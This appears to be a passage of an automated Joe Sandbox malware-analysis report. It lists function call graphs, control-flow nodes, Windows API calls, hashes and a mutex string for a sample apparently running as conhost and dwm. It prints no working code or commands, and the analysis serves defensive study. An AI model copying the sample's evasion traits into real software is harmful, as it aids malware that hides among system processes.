2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000157b 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000158a 2820->2821 2822 140001394 2 API calls 2821->2822 2823 140001599 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015a8 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015b7 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015c6 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015d5 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015e4 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015f3 2834->2835 2835->2247

                                              Callgraph

                                              • Executed
                                              • Not Executed
                                              • Opacity -> Relevance
                                              • Disassembly available
                                              callgraph 0 Function_00000001400057E1 1 Function_0000000140001AE4 31 Function_0000000140001D40 1->31 74 Function_0000000140001BA0 1->74 2 Function_00000001400014E5 70 Function_0000000140001394 2->70 3 Function_00000001400010F0 4 Function_00000001400014F4 4->70 5 Function_0000000140001E00 6 Function_0000000140002F00 52 Function_0000000140001370 6->52 7 Function_0000000140001000 7->5 35 Function_0000000140001750 7->35 79 Function_0000000140001FB0 7->79 86 Function_0000000140001FC0 7->86 8 Function_0000000140001800 63 Function_0000000140002290 8->63 9 Function_0000000140002500 10 Function_0000000140005901 11 Function_0000000140005701 12 Function_0000000140003101 13 Function_0000000140001503 13->70 14 Function_0000000140001404 14->70 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140001512 17->70 18 Function_0000000140002420 19 Function_0000000140002320 20 Function_0000000140003120 21 Function_0000000140001521 21->70 22 Function_0000000140005721 23 Function_0000000140005821 24 Function_0000000140001422 24->70 25 Function_0000000140001530 25->70 26 Function_0000000140001431 26->70 27 Function_000000014000153F 27->70 28 Function_0000000140001440 28->70 29 Function_0000000140003140 30 Function_0000000140001140 44 Function_0000000140001160 30->44 31->63 32 Function_0000000140005741 33 Function_0000000140001F47 53 Function_0000000140001870 33->53 34 Function_0000000140001650 36 Function_0000000140005C50 61 Function_0000000140005990 36->61 37 Function_0000000140002050 38 Function_0000000140005651 39 Function_0000000140003051 40 Function_000000014000155D 40->70 41 Function_000000014000145E 41->70 42 Function_0000000140002660 43 Function_0000000140003160 43->6 43->13 43->21 43->24 43->25 43->26 43->27 43->28 43->41 43->42 49 Function_000000014000156C 43->49 50 Function_000000014000146D 43->50 43->52 58 Function_000000014000157B 43->58 43->61 76 Function_00000001400015A8 43->76 77 Function_00000001400014A9 43->77 87 Function_00000001400016C0 43->87 97 Function_00000001400014D6 43->97 99 Function_00000001400026E0 43->99 44->43 44->44 44->53 59 Function_0000000140001880 44->59 62 Function_0000000140001F90 44->62 44->87 45 Function_0000000140001760 100 Function_00000001400020E0 45->100 46 Function_0000000140002460 47 Function_0000000140005761 48 Function_0000000140001E65 48->53 49->70 50->70 51 Function_000000014000216F 54 Function_0000000140001A70 54->31 54->74 55 Function_0000000140003070 56 Function_0000000140005970 57 Function_0000000140005671 58->70 59->18 59->31 59->42 59->74 60 Function_0000000140005781 64 Function_0000000140002590 65 Function_0000000140003090 66 Function_0000000140005790 67 Function_0000000140002691 68 Function_0000000140005691 69 Function_0000000140005891 70->36 73 Function_00000001400059A0 70->73 71 Function_0000000140002194 71->53 72 Function_000000014000219E 73->61 74->31 78 Function_00000001400023B0 74->78 91 Function_00000001400024D0 74->91 75 Function_0000000140001FA0 76->70 77->70 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400056B1 84 Function_00000001400057B1 85 Function_0000000140001AB3 85->31 85->74 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->31 89->74 90 Function_00000001400014C7 90->70 92 Function_00000001400017D0 93 Function_0000000140001FD0 94 Function_00000001400026D0 95 Function_00000001400056D1 96 Function_0000000140001AD4 96->31 96->74 97->70 98 Function_00000001400022E0 99->2 99->4 99->13 99->17 99->40 99->41 99->42 99->52 99->61 99->77 99->90 101 Function_00000001400017E0 101->100

                                              Executed Functions

                                              Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • NtQueryKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: Query
                                              • String ID:
                                              • API String ID: 3850148591-0
                                              • Opcode ID: 3301f31b9b9372cf5e9fb5ac19819fd970931c75b2ec92cec9ebb1f8227d5c90
                                              • Instruction ID: f63f3fa406a65e9cef5182409c799f841b718ba35abfe43b4d96b66f91fed5a6
                                              • Opcode Fuzzy Hash: 3301f31b9b9372cf5e9fb5ac19819fd970931c75b2ec92cec9ebb1f8227d5c90
                                              • Instruction Fuzzy Hash: 53F09DB2608B4086EAA2DB52F85579A77A0F38D7D4F009919BBC843735DB38C1948F84

                                              Non-executed Functions

                                              Function 00000001400026E0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 296 1400026e0-14000273b call 140002660 memset 299 140002741-14000274b 296->299 300 14000280e-14000285e call 14000155d 296->300 302 140002774-14000277a 299->302 307 140002953-14000297b call 1400014c7 300->307 308 140002864-140002873 300->308 302->300 303 140002780-140002787 302->303 305 140002789-140002792 303->305 306 140002750-140002752 303->306 309 140002794-1400027ab 305->309 310 1400027f8-1400027fb 305->310 314 14000275a-14000276e 306->314 324 140002986-1400029c8 call 140001503 call 140005990 memset 307->324 325 14000297d 307->325 312 140002eb7-140002ef4 call 140001370 308->312 313 140002879-140002888 308->313 316 1400027f5 309->316 317 1400027ad-1400027c2 309->317 310->314 319 1400028e4-14000294e wcsncmp call 1400014e5 313->319 320 14000288a-1400028dd 313->320 314->300 314->302 316->310 323 1400027d0-1400027d7 317->323 319->307 320->319 326 1400027d9-1400027f3 323->326 327 140002800-140002809 323->327 332 140002e49-140002e84 call 140001370 324->332 333 1400029ce-1400029d5 324->333 325->324 326->316 326->323 327->314 336 1400029d7-140002a0c 332->336 340 140002e8a 332->340 335 140002a13-140002a43 wcscpy wcscat wcslen 333->335 333->336 338 140002a45-140002a76 wcslen 335->338 339 140002a78-140002aa5 335->339 336->335 341 140002aa8-140002abf wcslen 338->341 339->341 340->335 342 140002ac5-140002ad8 341->342 343 140002e8f-140002eab call 140001370 341->343 344 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 342->344 345 140002ada-140002aee 342->345 343->312 364 140002dfd-140002e1b call 140001512 344->364 365 140002e20-140002e48 call 14000145e 344->365 345->344 364->365
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                              • String ID: 0$X$\BaseNamedObjects\ulpojverlpgmoqpnoymvmffc$`
                                              • API String ID: 780471329-87308227
                                              • Opcode ID: 4e170992e9a830f5e772ae352952b17f9812ae85f3991c60a6a0385c4d56b00b
                                              • Instruction ID: 4b2452acdf77ae7eb9e9dba2ffdaf4a4c6bd81904afe3535cf1bfc03d5242344
                                              • Opcode Fuzzy Hash: 4e170992e9a830f5e772ae352952b17f9812ae85f3991c60a6a0385c4d56b00b
                                              • Instruction Fuzzy Hash: 4C1237B2608B8085E762CB26F8443EA77A4F789794F404215EBE957BF5EF78C189C700
                                              Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                              • String ID:
                                              • API String ID: 2643109117-0
                                              • Opcode ID: c7a03f213bd366cb75c69d03db8ed93890885ebcc908e8cd25a5b94faf53fc0a
                                              • Instruction ID: 4d600fd05e0675b13939c2364bfb13a9e25d8fe7ab45c4a7bb0bf21a76da189a
                                              • Opcode Fuzzy Hash: c7a03f213bd366cb75c69d03db8ed93890885ebcc908e8cd25a5b94faf53fc0a
                                              • Instruction Fuzzy Hash: B051F6B1615A4485FA66EF27F9543EA27A2B78D7C0F448025FB8D873B1DE38C5998300
                                              Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 410 140001ba0-140001bc0 411 140001bc2-140001bd7 410->411 412 140001c09 410->412 413 140001be9-140001bf1 411->413 414 140001c0c-140001c17 call 1400023b0 412->414 415 140001bf3-140001c02 413->415 416 140001be0-140001be7 413->416 420 140001cf4-140001cfe call 140001d40 414->420 421 140001c1d-140001c6c call 1400024d0 VirtualQuery 414->421 415->416 419 140001c04 415->419 416->413 416->414 422 140001cd7-140001cf3 memcpy 419->422 425 140001d03-140001d1e call 140001d40 420->425 421->425 428 140001c72-140001c79 421->428 429 140001d23-140001d38 GetLastError call 140001d40 425->429 430 140001c7b-140001c7e 428->430 431 140001c8e-140001c97 428->431 433 140001cd1 430->433 434 140001c80-140001c83 430->434 435 140001ca4-140001ccf VirtualProtect 431->435 436 140001c99-140001c9c 431->436 433->422 434->433 438 140001c85-140001c8a 434->438 435->429 435->433 436->433 439 140001c9e 436->439 438->433 440 140001c8c 438->440 439->435 440->439
                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                              • VirtualProtect.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                              • memcpy.MSVCRT ref: 0000000140001CE0
                                              • GetLastError.KERNEL32(?,?,?,?,0000000140006C2C,0000000140006C2C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                              • API String ID: 2595394609-2123141913
                                              • Opcode ID: 5b3c3aee09c15950f6f519c6114b34436390ab1d73d09c3a1ce230fdd45d4aa1
                                              • Instruction ID: 6553d9e793cae567f2d3d1a7ece0d70305f3c176222a71b66c58140b8fcd43f4
                                              • Opcode Fuzzy Hash: 5b3c3aee09c15950f6f519c6114b34436390ab1d73d09c3a1ce230fdd45d4aa1
                                              • Instruction Fuzzy Hash: EE4122B1200A4582FA66DF57F884BE927A1F78DBC4F554126EF0A877B1DA38C58AC700
                                              Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 441 140002104-14000210b 442 140002111-140002128 EnterCriticalSection 441->442 443 140002218-140002221 441->443 444 14000220b-140002212 LeaveCriticalSection 442->444 445 14000212e-14000213c 442->445 446 140002272-140002280 443->446 447 140002223-14000222d 443->447 444->443 448 14000214d-140002159 TlsGetValue GetLastError 445->448 449 140002241-140002263 DeleteCriticalSection 447->449 450 14000222f 447->450 451 14000215b-14000215e 448->451 452 140002140-140002147 448->452 449->446 453 140002230-14000223f free 450->453 451->452 454 140002160-14000216d 451->454 452->444 452->448 453->449 453->453 454->452
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                              • String ID:
                                              • API String ID: 3326252324-0
                                              • Opcode ID: cea04487c8cb38a6d39b4516f0037f4bd1e247f2d982ee0beec2581bdbd8574b
                                              • Instruction ID: 1ad8b9b2a3bbc2eb96112f6623b64fb266d0520cc7f55f58799db44f9ed4ee4a
                                              • Opcode Fuzzy Hash: cea04487c8cb38a6d39b4516f0037f4bd1e247f2d982ee0beec2581bdbd8574b
                                              • Instruction Fuzzy Hash: 5221E3B0205A1092FA2BDB53FD443E923A5BB2CBD0F444121FF5A57AB4DF78C9868700
                                              Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 456 140001e10-140001e2d 457 140001e3e-140001e48 456->457 458 140001e2f-140001e38 456->458 460 140001ea3-140001ea8 457->460 461 140001e4a-140001e53 457->461 458->457 459 140001f60-140001f69 458->459 460->459 464 140001eae-140001eb3 460->464 462 140001e55-140001e60 461->462 463 140001ecc-140001ed1 461->463 462->460 467 140001f23-140001f2d 463->467 468 140001ed3-140001ee2 signal 463->468 465 140001eb5-140001eba 464->465 466 140001efb-140001f0a call 140005f40 464->466 465->459 472 140001ec0 465->472 466->467 477 140001f0c-140001f10 466->477 470 140001f43-140001f45 467->470 471 140001f2f-140001f3f 467->471 468->467 473 140001ee4-140001ee8 468->473 470->459 471->470 472->467 475 140001eea-140001ef9 signal 473->475 476 140001f4e-140001f53 473->476 475->459 478 140001f5a 476->478 479 140001f12-140001f21 signal 477->479 480 140001f55 477->480 478->459 479->459 480->478
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CCG
                                              • API String ID: 0-1584390748
                                              • Opcode ID: 0f9f17f4c65d1435a5d9e9c7b13e766323237c15eac66e646cd0680b98a8732f
                                              • Instruction ID: 81af10f137695faeb8d5a898949fea76fc9d6dccae56351016f0bb00a3375992
                                              • Opcode Fuzzy Hash: 0f9f17f4c65d1435a5d9e9c7b13e766323237c15eac66e646cd0680b98a8732f
                                              • Instruction Fuzzy Hash: D72159B1A0150642FA77DA2BB5943FA1182ABCD7E4F258535BF19473F9DE3C88828241
                                              Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 481 140001880-14000189c 482 1400018a2-1400018f9 call 140002420 call 140002660 481->482 483 140001a0f-140001a1f 481->483 482->483 488 1400018ff-140001910 482->488 489 140001912-14000191c 488->489 490 14000193e-140001941 488->490 491 14000194d-140001954 489->491 492 14000191e-140001929 489->492 490->491 493 140001943-140001947 490->493 496 140001956-140001961 491->496 497 14000199e-1400019a6 491->497 492->491 494 14000192b-14000193a 492->494 493->491 495 140001a20-140001a26 493->495 494->490 499 140001b87-140001b98 call 140001d40 495->499 500 140001a2c-140001a37 495->500 501 140001970-14000199c call 140001ba0 496->501 497->483 498 1400019a8-1400019c1 497->498 502 1400019df-1400019e7 498->502 500->497 503 140001a3d-140001a5f 500->503 501->497 506 1400019e9-140001a0d VirtualProtect 502->506 507 1400019d0-1400019dd 502->507 508 140001a7d-140001a97 503->508 506->507 507->483 507->502 511 140001b74-140001b82 call 140001d40 508->511 512 140001a9d-140001afa 508->512 511->499 518 140001b22-140001b26 512->518 519 140001afc-140001b0e 512->519 522 140001b2c-140001b30 518->522 523 140001a70-140001a77 518->523 520 140001b5c-140001b6c 519->520 521 140001b10-140001b20 519->521 520->511 525 140001b6f call 140001d40 520->525 521->518 521->520 522->523 524 140001b36-140001b57 call 140001ba0 522->524 523->497 523->508 524->520 525->511
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                              • API String ID: 544645111-395989641
                                              • Opcode ID: e04f8c0d7cc4af355b2a3ebedacf6063fbab78650547de3b21b1bc7de9d8dfc8
                                              • Instruction ID: ab8eb5788ef7bcd0d9c52a721197e98521d8b092ca33177dae5efd02ee1ad87a
                                              • Opcode Fuzzy Hash: e04f8c0d7cc4af355b2a3ebedacf6063fbab78650547de3b21b1bc7de9d8dfc8
                                              • Instruction Fuzzy Hash: 3E5136B2710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700
                                              Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 529 140001800-140001810 530 140001812-140001822 529->530 531 140001824 529->531 532 14000182b-140001867 call 140002290 fprintf 530->532 531->532
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                              • API String ID: 383729395-3474627141
                                              • Opcode ID: 56c25320ca969fe9d657b2bc87108a88152d4ef16f0091a1db2d016c02d442be
                                              • Instruction ID: 4e317e904b5edc20590a4237bc914c16bf87955fc737cdbf5c6a91052f1f93e5
                                              • Opcode Fuzzy Hash: 56c25320ca969fe9d657b2bc87108a88152d4ef16f0091a1db2d016c02d442be
                                              • Instruction Fuzzy Hash: 76F09671614A8482E612EB76F9413ED6361E75D7C1F54D211FF4E67662DF38D282C300
                                              Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 535 14000219e-1400021a5 536 140002272-140002280 535->536 537 1400021ab-1400021c2 EnterCriticalSection 535->537 538 140002265-14000226c LeaveCriticalSection 537->538 539 1400021c8-1400021d6 537->539 538->536 540 1400021e9-1400021f5 TlsGetValue GetLastError 539->540 541 1400021f7-1400021fa 540->541 542 1400021e0-1400021e7 540->542 541->542 543 1400021fc-140002209 541->543 542->538 542->540 543->542
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000043.00000002.2947114133.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000043.00000002.2947042007.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947179349.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947255103.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000043.00000002.2947326519.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                              • String ID:
                                              • API String ID: 682475483-0
                                              • Opcode ID: 50ff8ffc264fd61f5716ee5ba4a1b6e7512efc32f7fd1fd974904cad568eb405
                                              • Instruction ID: acbcca34618c974774002cdd018836bdbae4f3c1e7b74be4baf06767ce5c221f
                                              • Opcode Fuzzy Hash: 50ff8ffc264fd61f5716ee5ba4a1b6e7512efc32f7fd1fd974904cad568eb405
                                              • Instruction Fuzzy Hash: AD01B2B5305A0192FA2BDB63FE043E86365BB2CBD1F454021EF1A53AB4DF78C9968300

                                              Non-executed Functions

                                              Function 00000001403274D0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000044.00000002.2947116146.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                              • Associated: 00000044.00000002.2947044937.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949307247.00000001404C8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949307247.00000001404EC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949307247.0000000140777000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949307247.00000001407F8000.00000004.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949764149.00000001407FB000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949804790.000000014081B000.00000020.00000001.00020000.00000000.sdmpDownload File
                                              • Associated: 00000044.00000002.2949843634.0000000140821000.00000002.00000001.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_68_2_140000000_dwm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                              • String ID:
                                              • API String ID: 2933794660-0
                                              • Opcode ID: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                              • Instruction ID: 79b49984e369f14b3cfd6b091ae87a2c1abf041b5e0bbbfb70a1ccaeb1af311f
                                              • Opcode Fuzzy Hash: 50963c1dba7b536eca43502744e0d9cb47a5b65a5662e8b8edda2bbabb9365db
                                              • Instruction Fuzzy Hash: 89112736710F018AEB11CF61E8553A933A4F75DB58F481E25EB6D86BA4DBB8C1998340